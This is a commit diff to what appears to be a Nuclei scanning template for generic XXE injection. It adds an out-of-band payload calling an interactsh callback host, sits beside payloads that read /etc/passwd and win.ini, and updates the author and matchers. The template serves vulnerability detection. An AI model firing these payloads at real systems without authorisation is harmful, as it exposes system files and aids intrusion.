Merge pull request #10359 from Ahsraeisi/patch-5

Improve generic-xxe.yaml
2024-07-25 18:18:46 +05:30 · 2024-07-25 18:18:46 +05:30 · c6221aadc5
parent 6e2109f62f 8c57d4b85f
commit c6221aadc5
1 changed files with 9 additions and 4 deletions
--- a/dast/vulnerabilities/xxe/generic-xxe.yaml
+++ b/dast/vulnerabilities/xxe/generic-xxe.yaml
@ -1,8 +1,8 @@
 id: generic-xxe

 info:
-  name: Generic XML external entity (XXE)
-  author: pwnhxl
+  name: Generic XML External Entity - (XXE)
+  author: pwnhxl,AmirHossein Raeisi
  severity: medium
  reference:
    - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
@ -23,6 +23,7 @@ http:
      xxe:
        - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
        - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'
+        - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "http://{{interactsh-url}}"> ]><x>&{{rletter}};</x>'

    fuzzing:
      - part: query
@ -38,7 +39,6 @@ http:
          - "{{xxe}}"

    stop-at-first-match: true
-    matchers-condition: or
    matchers:
      - type: regex
        name: linux
@ -51,4 +51,9 @@ http:
        part: body
        words:
          - 'for 16-bit app support'
-# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950